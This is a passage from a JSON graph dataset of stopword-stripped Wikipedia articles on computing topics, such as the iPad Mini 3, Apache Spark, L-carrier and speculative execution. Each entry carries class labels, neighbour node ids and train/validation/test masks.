    "text": "IPad_Mini_3:ipad mini 3 ipad mini 3 stylized marketed ipad mini 3 third-generation ipad mini tablet computer designed developed marketed apple inc announced alongside ipad air 2 october 16 2014 released october 22 uses primarily design hardware predecessor ipad mini 2 new features addition touch id sensor compatible apple pay differing storage sizes available gold color well previous colors september 9 2015 ipad mini 3 discontinued replaced ipad mini 4 ipad mini 3 comes ios 8.1 operating system preinstalled comes several built-in applications camera photos messages facetime mail music safari maps siri calendar itunes store app store notes contacts ibooks game center reminders clock videos newsstand photo booth podcasts apple app store digital application distribution platform ios allows users browse download applications made various developers itunes store additional apps made apple available free download imovie garageband itunes u find iphone find friends apple store trailers remote iwork apps pages keynote numbers ipad mini 3 includes version apple pay built-in nfc functionality removed siri intelligent personal assistant knowledge navigator integrated device activated hands-free application uses natural language user interface answer questions make recommendations perform actions delegating requests set web services apple claims software adapts user individual preferences time personalizes results additionally siri identify songs using shazam listen song playing nearby siri stores list songs managed identify itunes facebook twitter come integrated apple native apps facebook features directly accessed within native apps calendar sync facebook events use facebook like button within apple app store ipad mini 3 uses almost exactly design ipad mini 2 addition touch id additionally announcement ipad mini 3 ipad air 2 apple added gold color option existing silver space gray color choices ipads ipad mini 3 uses nearly hardware ipad mini 2 main exception addition touch id sensor 7.9 retina display 2048-by-1536-pixel resolution 326 ppi ipad mini 3 also uses a7 chip 64-bit architecture m7 motion coprocessor 5mp isight camera capable recording 1080p hd video 1.2mp facetime hd camera capable recording 720p hd video new touch id sensor detects user fingerprint used instead passcode unlock ipad touch id ipad mini 3 also compatible apple pay used authorize purchases online apps fingerprint verification opposed entering passwords ipad mini 3 available storage options 16 64 128gb expansion option apple released camera connection kit sd card reader used transfer photos videos ipad ipad mini 3 received positive reviews drew fainter praise predecessor identical ipad mini 2 except addition touch id availability gold color ipad mini 2 regarded better buy 100 usd cheaper featuring screen internals mini 2 3 stuck hardware level original ipad air ipad air 2 new hardware considerably powerful furthermore air 2 also redesigned lighter smaller original air nullified advantages mini 2 3 compact form factor",
    "neighbors": [
      10755,
      9732,
      1549,
      5647,
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      6186,
      4139,
      6700,
      7211,
      1074,
      8754,
      9784,
      8253,
      576,
      1090,
      8783,
      4180,
      10838,
      1623,
      3672,
      10840,
      9312,
      3681,
      9826,
      3691,
      2673,
      6258,
      10357,
      6264,
      4220,
      7292,
      2686,
      6783,
      7806,
      10365,
      10878,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      5784,
      1177,
      4251,
      3228,
      2207,
      4258,
      7842,
      7844,
      11430,
      171,
      2735,
      3248,
      4283,
      3772,
      7869,
      8893,
      8896,
      6654,
      4807,
      4810,
      3790,
      1744,
      3286,
      9430,
      3293,
      4318,
      9952,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      1776,
      10481,
      7420,
      1290,
      3338,
      781,
      4879,
      784,
      9999,
      10512,
      4888,
      5912,
      8480,
      10020,
      10023,
      4910,
      4399,
      7983,
      7991,
      11066,
      2363,
      2365,
      2366,
      9022,
      11257,
      1346,
      10562,
      838,
      7496,
      8525,
      2388,
      8534,
      3928,
      8540,
      4957,
      6495,
      8544,
      9063,
      10602,
      3948,
      11629,
      8046,
      10608,
      9084,
      7549,
      11649,
      2439,
      6023,
      3977,
      6539,
      7052,
      1428,
      3483,
      2979,
      9123,
      11173,
      8109,
      2492,
      446,
      7614,
      5058,
      10691,
      2502,
      456,
      1482,
      7118,
      464,
      6608,
      8662,
      9174,
      10199,
      8665,
      7133,
      9182,
      4068,
      5093,
      487,
      2023,
      8170,
      5616,
      6130,
      7154,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8807,
    "label": 4,
    "text": "Open_Identity_Exchange:open identity exchange open identity exchange oix membership organisation works accelerate adoption digital identity services based open standards non-profit organisation technology agnostic collaborative works across private public sectors members work together jointly fund participate pilot projects sometimes referred alpha projects pilots test business legal and/or technical concepts theory interoperability real world use cases white paper published every project shortly coming office obama administration asked u.s. general services administration gsa leverage open identity technologies allow american public easily efficiently safely interact federal websites national institute health nih social security administration ssa internal revenue service irs 2009 rsa conference gsa sought build public/private partnership open id foundation oidf information card foundation icf order craft workable identity information framework would establish legal policy precedents needed establish trust open id transactions partnership eventually developed trust framework model described meetings held internet identity workshop november 2009 resulted oidf icf forming joint steering committee committee task study best implementation options newly created framework us chief information officer recommended formation non-profit corporation open identity exchange oix january 2010 oidf icf approved grants fund creation open identity exchange oix first trust framework provider certified us government booz allen hamilton ca technologies equifax google paypal verisign verizon members either oidf icf agreed become founding members oix open identity exchange publicly launched rsa 2010 addressed increasing challenges building trust online identity outlined 2012 executive director position founded national strategy trusted identities cyberspace nstic pilot projects showed growing proof traction increased awareness attention 2012 oix uk formed throughout 2013 initial uk cabinet office identity assurance programme idap pilots launched white papers published 2014 oix established oixnet trust registry global authoritative registry business legal technical requirements needed ensure market adoption global interoperability 2014 oidf also announced plans register companies self-certifying conformance openid connect via openid certification program oixnet official online publicly-accessible repository documents information relating identity systems identity system participants referred “ registry ” functions official centralized source documents information much like government-operated recorder deeds individuals entities register documents information oixnet registry provide notice contents public members public seeking access documents information go single authoritative location find oixnet registry designed provide single comprehensive authoritative location documents information relating specific purpose case identity systems safely stored purpose putting others notice certain facts documents information accessed interested stakeholders seeking information oixnet launched 2015 openid foundation first registrant registering initial set organizations including google forgerock microsoft nri paypal ping identity certifying conformance openid connect additional registrations added oixnet throughout 2015 2016 10 trusted identity services currently registered oixnet registry currently pilot 2016 registering new diverse trust frameworks communities interest oix developed chapters policy 2015 allows regional oix chapters established 2016 oix united kingdom chapter approved oix board launched oix board represents leaders online identity internet telecom data aggregation industries concerned market expansion information security oix board met howard schmidt 2011 discuss public–private partnership envisioned nstic strategy uk government cabinet office joined oix board level began work identity assurance programme gov.uk verify states jersey joined 2015 could leverage knowledge gained development uk government identity assurance programme hasten adaptation adoption jersey open identity exchange currently thirteen executive members 50+ general members november 2016 executive members beginning 2015 cabinet office requested open identity exchange begin process exploring legal business pragmatic considerations creating self-sustaining uk ‘ chapter ’ open identity exchange point oix uk operated independent uk entity able administer ‘ directed funding ’ member organisations received series grants uk cabinet office used collaboratively funded projects ad-hoc board advisers formed independent experienced public private sector leaders addressed policy considerations transition process addition considering role oix uk future board advisers considered private sector ’ needs identity services resulting ongoing oix project open identity exchange board directors approved oix chapters policy end 2015 allowing formation individual chapters affiliated oix various local markets april 2016 oix uk europe chapter appointed board directors oix white papers deliver joint research examine wide range challenges facing open identity market provide possible solutions written experts fields technology particularly open identity open identity exchange oix white papers focus current issues opportunities emerging identity markets oix white papers intended deliver value identity ecosystem take one two perspectives retrospective report outcome given project pilot prospective discussion current issue opportunity oix white papers authored independent domain experts intended summaries general business audience recent published whitepapers include • use online activity part identity verification • uk private sector needs identity assurance • use digital identity peer-to-peer economy • shared signals proof concept • creating digital identity jersey • giving gov.uk verify • creating pensions dashboard • could digital identities help transform consumers attitudes behavior towards savings • digital identity across borders opening bank account another eu country • generating revenue subscriber benefits analysis arpu identity oix projects deliver joint research examine wide range challenges facing open identity market provide possible solutions hypothesis uk government identity assurance model could adapted jersey support certified uk idps potential identity assurance hub providers meet requirements soj hypothesis also considered would create attractive market opportunity jersey one providers 3-year project started september 2016 partially funded european union horizon 2020 research innovation programme g.a 700321 lightest consortium consists 14 partners 9 european countries coordinated fraunhofer-gesellschaft project looks reach beyond europe build global community lightest lightweight infrastructure global heterogeneous trust management support open ecosystem stakeholders trust schemes objective lightest create global cross-domain trust infrastructure renders transparent easy verifiers evaluate electronic transactions querying different trust authorities worldwide combining trust aspects related identity business reputation etc become possible conduct domain-specific trust decisions achieved reusing existing governance organization infrastructure standards software community know-how existing domain name system combined new innovative building blocks approach allows efficient global rollout solution assists decision makers trust decisions integrating mobile identities scheme lightest also enables domain-specific assessments levels assurance identities uk government cabinet office joined oix board level began work identity assurance programme idap oix directed funding programme considerable number projects continue carried oix governance results helped ongoing development gov.uk verify work continues gds looks digital identities used public private sector gov.uk verify built maintained government digital service gds part cabinet office uk government committed expanding gov.uk verify helping grow market identity assurance able meet user needs relation central government services well local health private sector services gov.uk verify uses certified companies verify identity government certified company private company works high industry government standards verify identity",
    "neighbors": [
      1312,
      8865,
      9569,
      2887,
      4830,
      1966,
      11021,
      3026,
      7899,
      4732,
      30
    ],
    "mask": "Test"
  },
  {
    "node_id": 8808,
    "label": 1,
    "text": "Database_design:database design database design organization data according database model designer determines data must stored data elements interrelate information begin fit data database model database design involves classifying data identifying interrelationships theoretical representation data called ontology ontology theory behind database design majority cases person design database person expertise area database design rather expertise domain data stored drawn e.g financial information biological information etc therefore data stored database must determined cooperation person expertise domain aware data must stored within system process one generally considered part requirements analysis requires skill part database designer elicit needed information domain knowledge necessary domain knowledge frequently express clearly system requirements database unaccustomed thinking terms discrete data elements must stored data stored determined requirement specification database designer aware data stored within database must determine dependency within data sometimes data changed changing data visible example list names addresses assuming situation multiple people address one person one address address dependent upon name provided name list address uniquely determined however inverse hold given address list name uniquely determined multiple people reside address address determined name address considered dependent name relationships dependencies amongst various pieces information determined possible arrange data logical structure mapped storage objects supported database management system case relational databases storage objects tables store data rows columns object database storage objects correspond directly objects used object-oriented programming language used write applications manage access data relationships may defined attributes object classes involved methods operate object classes way mapping generally performed set related data depends upon single object whether real abstract placed table relationships dependent objects stored links various objects table may represent implementation either logical object relationship joining one instances one logical objects relationships tables may stored links connecting child tables parents since complex logical relationships tables probably links one parent database designs also include er entity-relationship model diagrams er diagram diagram helps design databases efficient way attributes er diagrams usually modeled oval name attribute linked entity relationship contains attribute field relational database design normalization systematic way ensuring database structure suitable general-purpose querying free certain undesirable characteristics—insertion update deletion anomalies could lead loss data integrity standard piece database design guidance designer create fully normalized design selective denormalization subsequently performed performance reasons trade-off storage space vs performance normalized design less data redundancy therefore takes less space store however common data retrieval patterns may need complex joins merges sorts occur takes data read compute cycles modeling disciplines dimensional modeling approach data warehouse design explicitly recommend non-normalized designs i.e designs large part adhere 3nf normalization consists normal forms 1nf,2nf,3nf boyce-codd nf 3.5nf ,4nf 5nf document databases take different approach document stored database typically would contain one normalized data unit often relationships units well data units relationships question often retrieved together approach optimizes number retrieves also simplifies data gets replicated clearly identifiable unit data whose consistency self-contained another consideration reading writing single document databases require single transaction important consideration microservices architecture situations often portions document retrieved services via api stored locally efficiency reasons data units split across services read write support service consumer might require one service calls could result management multiple transactions may preferred schema refinement database specifies data normalized reduce data insufficiency conflicts physical design database specifies physical configuration database storage media includes detailed specification data elements data types indexing options parameters residing dbms data dictionary detailed design system includes modules database hardware software specifications system",
    "neighbors": [
      7168,
      8201,
      10258,
      2068,
      1049,
      1562,
      5658,
      8742,
      10286,
      2623,
      9286,
      72,
      10326,
      11362,
      9828,
      2669,
      2681,
      1146,
      2688,
      10389,
      6822,
      4263,
      5808,
      10418,
      9397,
      3768,
      11457,
      11472,
      10452,
      9942,
      2780,
      10471,
      6383,
      2810,
      9467,
      9481,
      10505,
      8979,
      7446,
      10518,
      4376,
      5403,
      7968,
      290,
      1314,
      7461,
      2344,
      9527,
      4412,
      4416,
      2369,
      5441,
      5953,
      10048,
      8518,
      853,
      2901,
      860,
      7523,
      3951,
      9075,
      9079,
      10632,
      2456,
      9112,
      9631,
      10145,
      9634,
      7080,
      5550,
      3004,
      9661,
      9663,
      9677,
      9177,
      987,
      9183,
      4065,
      6124,
      2544,
      10737
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8809,
    "label": 3,
    "text": "Army_Moves:army moves army moves scrolling shooter game developed dinamic software amiga amstrad cpc atari st commodore 64 msx zx spectrum first chapter moves trilogy followed navy moves 1987 arctic moves 1995 first released 1986 published dinamic spain imagine software dinamic software also developed ms-dos version game published 1989 spain game contains seven levels divided two main sections first four levels make first section player drive army unit jeep helicopter terrain steering clear hostile vehicles last three levels comprise second main section one plays soldier shoots enemies along way level 5 soldier must jump rock rock river shooting hostile birds thereafter soldier makes way enemy headquarters goal retrieving secret documents army moves regarded rather bad game amiga — almost non-existent gameplay makes poor value money according review zzap however received mixed reviews zx spectrum magazines successful enough spain spawn two follow-ups navy moves 1988 arctic moves 1995 latter appeared pc platform included first two chapters series playable zx spectrum emulator extra fourth entry series desert moves announced end game arctic moves never appeared game music non-spanish versions based colonel bogey march",
    "neighbors": [
      10931,
      9166,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 8810,
    "label": 7,
    "text": "Apache_Spark:apache spark apache spark open-source distributed general-purpose cluster-computing framework spark provides interface programming entire clusters implicit data parallelism fault tolerance originally developed university california berkeley amplab spark codebase later donated apache software foundation maintained since apache spark architectural foundation resilient distributed dataset rdd read-only multiset data items distributed cluster machines maintained fault-tolerant way dataframe api released abstraction top rdd followed dataset api spark 1.x rdd primary application programming interface api spark 2.x use dataset api encouraged even though rdd api deprecated rdd technology still underlies dataset api spark rdds developed 2012 response limitations mapreduce cluster computing paradigm forces particular linear dataflow structure distributed programs mapreduce programs read input data disk map function across data reduce results map store reduction results disk spark rdds function working set distributed programs offers deliberately restricted form distributed shared memory spark facilitates implementation iterative algorithms visit data set multiple times loop interactive/exploratory data analysis i.e. repeated database-style querying data latency applications may reduced several orders magnitude compared apache hadoop mapreduce implementation among class iterative algorithms training algorithms machine learning systems formed initial impetus developing apache spark apache spark requires cluster manager distributed storage system cluster management spark supports standalone native spark cluster hadoop yarn apache mesos kubernetes distributed storage spark interface wide variety including alluxio hadoop distributed file system hdfs mapr file system mapr-fs cassandra openstack swift amazon s3 kudu lustre file system custom solution implemented spark also supports pseudo-distributed local mode usually used development testing purposes distributed storage required local file system used instead scenario spark run single machine one executor per cpu core spark core foundation overall project provides distributed task dispatching scheduling basic i/o functionalities exposed application programming interface java python scala r centered rdd abstraction java api available jvm languages also usable non-jvm languages connect jvm julia interface mirrors functional/higher-order model programming driver program invokes parallel operations map filter reduce rdd passing function spark schedules function execution parallel cluster operations additional ones joins take rdds input produce new rdds rdds immutable operations lazy fault-tolerance achieved keeping track lineage rdd sequence operations produced reconstructed case data loss rdds contain type python java scala objects besides rdd-oriented functional style programming spark provides two restricted forms shared variables broadcast variables reference read-only data needs available nodes accumulators used program reductions imperative style typical example rdd-centric functional programming following scala program computes frequencies words occurring set text files prints common ones variant takes anonymous function performs simple operation single data item pair items applies argument transform rdd new rdd spark sql component top spark core introduced data abstraction called dataframes provides support structured semi-structured data spark sql provides domain-specific language dsl manipulate dataframes scala java python also provides sql language support command-line interfaces odbc/jdbc server although dataframes lack compile-time type-checking afforded rdds spark 2.0 strongly typed dataset fully supported spark sql well spark streaming uses spark core fast scheduling capability perform streaming analytics ingests data mini-batches performs rdd transformations mini-batches data design enables set application code written batch analytics used streaming analytics thus facilitating easy implementation lambda architecture however convenience comes penalty latency equal mini-batch duration streaming data engines process event event rather mini-batches include storm streaming component flink spark streaming support built-in consume kafka flume twitter zeromq kinesis tcp/ip sockets spark 2.x separate technology based datasets called structured streaming higher-level interface also provided support streaming spark mllib distributed machine-learning framework top spark core due large part distributed memory-based spark architecture much nine times fast disk-based implementation used apache mahout according benchmarks done mllib developers alternating least squares als implementations mahout gained spark interface scales better vowpal wabbit overview spark mllib exists many common machine learning statistical algorithms implemented shipped mllib simplifies large scale machine learning pipelines including graphx distributed graph-processing framework top apache spark based rdds immutable graphs immutable thus graphx unsuitable graphs need updated let alone transactional manner like graph database graphx provides two separate apis implementation massively parallel algorithms pagerank pregel abstraction general mapreduce-style api unlike predecessor bagel formally deprecated spark 1.6 graphx full support property graphs graphs properties attached edges vertices graphx viewed spark in-memory version apache giraph utilized hadoop disk-based mapreduce like apache spark graphx initially started research project uc berkeley amplab databricks later donated apache software foundation spark project spark initially started matei zaharia uc berkeley amplab 2009 open sourced 2010 bsd license 2013 project donated apache software foundation switched license apache 2.0 february 2014 spark became top-level apache project november 2014 spark founder m. zaharia company databricks set new world record large scale sorting using spark spark excess 1000 contributors 2015 making one active projects apache software foundation one active open source big data projects given popularity platform 2014 paid programs like general assembly free fellowships like data incubator started offering customized training courses spark deployed traditional on-premises data center well cloud cloud allows organizations deploy spark without need acquire hardware specific setup expertise providers managed spark solutions enterprise strategy group esg-global.com found 43 respondents considering cloud primary deployment spark top reasons customers perceived cloud advantage spark faster time deployment better availability frequent feature/functionality updates elasticity geographic coverage costs linked actual utilization",
    "neighbors": [
      5640,
      6161,
      7699,
      1047,
      8217,
      11303,
      6184,
      5677,
      7218,
      11323,
      9789,
      6718,
      7742,
      7233,
      2113,
      7750,
      8269,
      11343,
      7248,
      9300,
      2140,
      7261,
      8799,
      4194,
      8294,
      9320,
      2163,
      5238,
      6774,
      3705,
      7802,
      3197,
      9344,
      9345,
      10377,
      6797,
      8860,
      6815,
      5798,
      10413,
      4286,
      6338,
      1222,
      4294,
      9926,
      5833,
      4308,
      5332,
      2264,
      8408,
      731,
      734,
      11487,
      8425,
      747,
      237,
      8447,
      3328,
      2314,
      8460,
      1296,
      785,
      2834,
      1306,
      7963,
      3877,
      2345,
      4909,
      1327,
      7983,
      8501,
      823,
      4919,
      1851,
      5948,
      7485,
      4417,
      8514,
      4419,
      5956,
      4423,
      1866,
      8523,
      4944,
      1363,
      2901,
      344,
      865,
      11111,
      8554,
      1913,
      6536,
      7567,
      10649,
      11161,
      6555,
      9631,
      10661,
      9126,
      10675,
      5047,
      4538,
      6074,
      11201,
      1991,
      1480,
      5066,
      8139,
      9677,
      3545,
      9179,
      990,
      10719,
      5090,
      11235,
      7142,
      2536,
      4589,
      7159,
      1018,
      508,
      2557
    ],
    "mask": "None"
  },
  {
    "node_id": 8811,
    "label": 5,
    "text": "L-carrier:l-carrier l-carrier system one series carrier systems developed high-capacity transmission long-distance communications period late 1930s 1970s system evolved six significant phases development designated bell system engineers l-1 l-5 l-5e coaxial cable principle transmission medium stages initially lending system another descriptions coaxial system successor series previous carrier systems typically identified capital letters 1960s system hardened dangers cold war using complete placement terminal repeater equipment hardened underground vaults initial development testing coaxial system took place 1935 1937 test bed 95-mile two-way coaxial cable locations new york city philadelphia distance 3800 miles simulated repeatedly remodulating signals looping twenty times endpoints system provided 240 channels single circuit first production installation l-1 carrier system went service stevens point wi minneapolis mn 1941 distance almost 200 miles capacity 480 channels far could carried balanced pair carrier systems cheaper per channel high-usage routes small-scale l2 system baltimore md washington dc intended short-distance low-volume traffic abandoned early stage anticipation end war-time responsibilities announced december 1944 development plan nationwide build-out coaxial carrier network support long-distance telephone service also television transmissions result post-war research goal definition l-3 carrier system successive version least twice many channels previous version culminating l-5e design 1976 long lines built two coast-to-coast systems l-3 well shorter ones connecting major cities especially big cities eastern united states supplement mainstay microwave radio relay systems later upgraded l-4 others simply overbuilt new l-5 system starting 1911 telephone networks used frequency-division multiplexing carry several voice channels single physical circuit beginning first type c carrier year heterodyned three voice channels stacked top one voice circuit l-carrier systems loaded multiplexing supermultiplexing single sideband channels using long-standard 12 channel voice group produced type channel banks occupying frequency spectrum 60 108 khz basic group entire line spectrum previous long haul carrier systems types j k. first type a-1 channel banks appeared use type j open wire carrier 1934 work espenschied herman affel bell labs patented piezoelectric crystal lattice filters provide sharp bandpass cutoff made single-sideband carrier work lattice filters heart analog multiplex systems using single-sideband/carrier suppressed architecture active ic-based filtering became available mid-1970s single-sideband modulation schemes twelve voice channels would modulated channel group turn five groups could multiplexed similar method supergroup containing 60 voice channels one 48 khz group-band circuit sometimes used single high speed data link rather voice circuits also entire supergroups could dedicated single data channel running data rate 56 kbit/s early late 1960s long distance systems supergroups multiplexed mastergroups 300 voice channels european ccitt hierarchy 600 long lines type l-600 multiplex transmission coaxial cable microwave even higher levels multiplexing became possible send thousands voice channels single circuit example type l-4 system used multi-master group system stack six u600 mastergroups l4 line spectrum hardware modified take three mmg spectra stack early l5 line spectrum later advancements technology allowed even stacking type l-5e allowing 22 mastergroups stacked 66 mhz line spectrum accompanying diagrams process bell system type channel bank forming mastergroup three stages l-carrier also carried first television network connections though later microwave radio relay system soon became important purpose type l-3 used short time coast-to-coast network television feeds advent ntsc color cause move type td microwave radio tube repeaters l-3 added much group delay baseband broadcast signal cables much use broadcasters l-pipes n't used broadcast television much around 1964 variant 1950s l-3 system designed early 1960s provide land line connections key military command control facilities united states starting l-3i improved system upgraded able withstand nuclear attack system consisted 100 main stations 1000 individual repeater vaults main stations emergency power systems blast doors accommodations staff two-week post-attack period nuclear early warning systems blast detection emergency services generally provided redundant underground microwave circuits case one failed late 1970s early 1980s l-carrier system determined redundant advance satellite fiber-optic communication cables upgraded t-4 t-5 instead l-5 never upgraded past l-4 due advancement technology generally advancement glass fiber laser technology made copper coaxial cable obsolete long haul carrier service western electric fielded ft series g single-mode fiber cable system 1984",
    "neighbors": [
      7490,
      2787,
      5162,
      3115,
      3156,
      5941
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8812,
    "label": 3,
    "text": "Amlogic:amlogic amlogic sometimes stylized amlogic american technology company founded us amlogic inc. predominantly focused designing selling soc system chip integrated circuits like fabless companies industry company outsources actual manufacturing chips third-party independent chip manufacturers tsmc main target applications entertainment devices android-based tv iptv/ott set-top boxes media dongles smart tvs tablets offices shanghai beijing shenzhen taipei hong kong santa clara california company founded 1995 silicon valley developed video cd player chips later chips dvd players applications involving mpeg2 decoding amlogic involved creation hvd high-definition versatile disc standard promoted china alternative dvd video disks used dvd players company player developing chinese tablet processor market since 2010-2013 amlogic arm licensee uses arm architecture majority products according joint press release arm 2013 first company use arm mali-450 gpu configuration six cores m801/802 uses new version arm cortex-a9 core a9r4 theoretically allows higher clock speeds lower power consumption compared older versions cortex a9 core a9r3 used rockchip rk3188 originally scheduled production early middle 2013 form aml8726-m8 april 2014 one tablet onda v975m announced using chip m8 family manufacturers shown android tv boxes using m802 shenzhen tomato technology tronsmart eny technology geniatech noted devices using m802 may run hot use heatsink cooling common among popular ott set top boxes amazon firetv uses metal shell disperse heat much like heatsink would amlogic also offers soc products s802 s805 s812 specifically targeting android tv boxes ott set-top boxes variations similar socs series targeting tablets s8**-h models include dolby/dts licenses first 64-bit amlogic products lineup s9** -h models include dolby/dts licenses devices based already market running android 5.1 7.1 usually paired 1gb 2gb 3gb ram 8gb 64gb flash mem features gigabit lan dual band 2.4g/5g a/c wifi s905x scheduled released q1 2016 s905d s912 scheduled q2 2016 three socs android marshmallow buildroot linux sdks released ibc 2018 amlogic showed public first time second generation socs media players reference boards running android tv 9 q3 2017 amlogic released new socs targeting smart speakers audio applications amlogic mx s802 s805 socs also targeted media dongles amlogic also offers socs targeting smart tvs projectors including m6l m6c m6d t826 t828 t866 t868 t962 t966 t968 amlogic publish sales financial information website company listed client several venture capital firms market socs targeting chinese tablet manufacturers manufacturers android media players tv boxes media dongles faces competition primarily rockchip allwinner technology actions semiconductor mediatek intel realtek amlogic reported fourth largest application processor supplier chinese tablets 2012 q2 2014 amlogic reported fifth largest supplier rockchip mediatek allwinner actions semiconductor chinese soc suppliers cellular baseband technology disadvantage compared companies mediatek also supply smartphone market white-box tablet makers increasingly add phone functionality products 2011 aml8726-m selected one hottest processors ee times china 2012 aml8726-mx ee times-china processor year award amlogic maintains website dedicated providing source code linux kernel android sdk supporting amlogic chips reference designs linux kernel source code freely available recently april 2014 updated support certain chips m8 family well older mx family android versions 4.4 kitkat supported based linux kernel version 3.10.x however android sdk requires nda available business partners source code includes linux kernel 3.10.10 u-boot realtek broadcom wi-fi drivers nand drivers “ tvin ” drivers kernel space gpu drivers mali-400/450 gpu xbmc/kodi amlogic s805 m805 s806 m806 s812 android video decoding compatibility list http //kodi.wiki/view/android_hardware compatible_chipsets however effort push linux upstream support gx arm64 lineup ongoing http //linux-meson.com/ currently aml8726mx s802 s805 s905 soc booting headless linux 4.8 s905x s905d s912 headless support expected linux 4.10",
    "neighbors": [
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      8237,
      9774,
      2097,
      8250,
      1083,
      8253,
      7745,
      7747,
      2635,
      99,
      8812,
      10361,
      638,
      644,
      8842,
      146,
      659,
      7833,
      666,
      5786,
      4258,
      4773,
      9913,
      8383,
      10945,
      4821,
      2788,
      3301,
      9964,
      1776,
      6391,
      3835,
      2814,
      781,
      2838,
      798,
      5417,
      2862,
      7988,
      11062,
      6971,
      10562,
      8003,
      6981,
      5963,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      11629,
      6001,
      373,
      8058,
      392,
      1428,
      4508,
      10658,
      5028,
      7077,
      9638,
      3511,
      9155,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      2524,
      9182,
      1014,
      3575
    ],
    "mask": "None"
  },
  {
    "node_id": 8813,
    "label": 9,
    "text": "Hermann_Bottenbruch:hermann bottenbruch hermann bottenbruch born september 14 1928 german mathematician computer scientist bottenbruch grew german state north rhine-westphalia toward end second world war served 1947 began study mathematics graduated 1951 following graduation joined staff institute applied mathematics tu darmstadt institute founded alwin walther bottenbruch earned doctorate 1957 year walther recommendation joined international working group develop new programming language language intended combine current understanding programming languages single standard according friedrich bauer bottenbruch coined name algol least germany english algorithmic language “ 1958 members working group—friedrich l. bauer bottenbruch heinz rutishauser klaus samelson john backus charles katz alan perlis joseph henry wegstein—met eth zurich result deliberations algol 58 1960 1961 bottenbruch worked us oak ridge national laboratory took leading position german industry among things served specialist area industrial chimney construction 1994 founded company primasoft gmbh german city oberhausen providing consulting database solutions",
    "neighbors": [
      512,
      5496,
      9804,
      1392,
      2901,
      10047,
      1976,
      5946,
      1883,
      1823
    ],
    "mask": "Train"
  },
  {
    "node_id": 8814,
    "label": 4,
    "text": "Ruth_A._David:ruth a. david ruth a. david born 1953 american engineer cia david responsible encouraging agency pursue partnerships private sector designed proposal procure technology stage development private sector awarded cia director award defense intelligence agency director award cia distinguished intelligence medal national reconnaissance officer award distinguished service national security agency distinguished service medal ruth a. david born may 13 1953 arkansas city kansas attaining bs electrical engineering wichita state university 1975 went earn master 1976 phd 1981 electrical engineering stanford university david began career 1975 holding several positions sandia national laboratories albuquerque new mexico served adjunct professor university new mexico teaching adaptive digital signal digital microprocessor system design linear least-squares estimation 1986 employed supervisor data systems development organization responsible developing remote controlled digital system deployment underground nuclear tests nevada test site three years later transferred federal aviation administration managing department non-destructive test electromagnetic test optics program aging aircraft 1991 1994 david director development testing center supervising broad spectrum engineering test facilities 1995 appointed deputy director science technology central intelligence agency became responsible advising agency science technology capacity proposed radical new approach agency deal swift growth information internet revolution rather procuring technology developed david deputy joanne isham recognized pushed agency pursue partnerships within private sector technology advancing far faster government bureaucracy procurement program could secure new innovation proposed technology obtained stage development private sector recommended utilizing technology streamline processes move away simply collecting data toward analytical leveraged position disseminating exploiting information 1998 david left cia awarded cia director award defense intelligence agency director award cia distinguished intelligence medal national reconnaissance officer award distinguished service national security agency distinguished service medal year david joined anser formerly analytic services inc. president chief executive officer anser provided analysis research public service national transnational security issues 1999 developed homeland defense strategic thrust focus research internal external terrorist entities hostile nations expanded department anser institute homeland security 2001 provide public awareness education national security 2010 david inducted women technology international hall fame appointed president obama member national science board national science foundation 2012 david retired anser 2015",
    "neighbors": [
      7887
    ],
    "mask": "Test"
  },
  {
    "node_id": 8815,
    "label": 3,
    "text": "Speculative_execution:speculative execution speculative execution optimization technique computer system performs task may needed work done known whether actually needed prevent delay would incurred work known needed turns work needed changes made work reverted results ignored objective provide concurrency extra resources available approach employed variety areas including branch prediction pipelined processors value prediction exploiting value locality prefetching memory files optimistic concurrency control database systems speculative multithreading special case speculative execution modern pipelined microprocessors use speculative execution reduce cost conditional branch instructions using schemes predict execution path program based history branch executions order improve performance utilization computer resources instructions scheduled time yet determined instructions need executed ahead branch speculative computation related earlier concept eager execution form speculative execution sides conditional branch executed however results committed predicate true unlimited resources eager execution also known oracle execution would theory provide performance perfect branch prediction limited resources eager execution employed carefully since number resources needed grows exponentially level branch executed eagerly predictive execution form speculative execution outcome predicted execution proceeds along predicted path actual result known prediction true predicted execution allowed commit however misprediction execution unrolled re-executed common forms include branch predictors memory dependence prediction generalized form sometimes referred value prediction lazy execution involve speculation incorporation speculative execution implementations haskell programming language current research topic eager haskell designed around idea speculative execution 2003 phd thesis made ghc support kind speculative execution abortion mechanism back case bad choice called optimistic execution deemed complicated starting 2017 series security vulnerabilities found implementations speculative execution common processor architectures effectively enabled elevation privileges include",
    "neighbors": [
      1024,
      5636,
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      9762,
      3619,
      6181,
      8231,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      7745,
      3142,
      2638,
      1122,
      8293,
      3175,
      1140,
      630,
      8822,
      6268,
      3197,
      7804,
      7313,
      6804,
      7833,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      9932,
      5329,
      6865,
      10966,
      731,
      9435,
      11487,
      10469,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      3317,
      10485,
      249,
      3835,
      8700,
      1798,
      3846,
      1801,
      6926,
      6415,
      1298,
      11539,
      2339,
      3876,
      4389,
      6950,
      5417,
      4909,
      3886,
      309,
      8501,
      5948,
      4928,
      6978,
      8003,
      8514,
      4423,
      11080,
      8523,
      6476,
      7505,
      9044,
      11604,
      344,
      8543,
      1376,
      3431,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      10618,
      3457,
      6536,
      1933,
      398,
      3470,
      5518,
      5523,
      1430,
      407,
      409,
      10658,
      9126,
      936,
      10669,
      1967,
      2480,
      10675,
      8628,
      1461,
      1463,
      7607,
      4030,
      453,
      3014,
      7631,
      466,
      2514,
      980,
      473,
      1499,
      10205,
      1502,
      7134,
      5090,
      995,
      7653,
      9707,
      10734,
      6639,
      499,
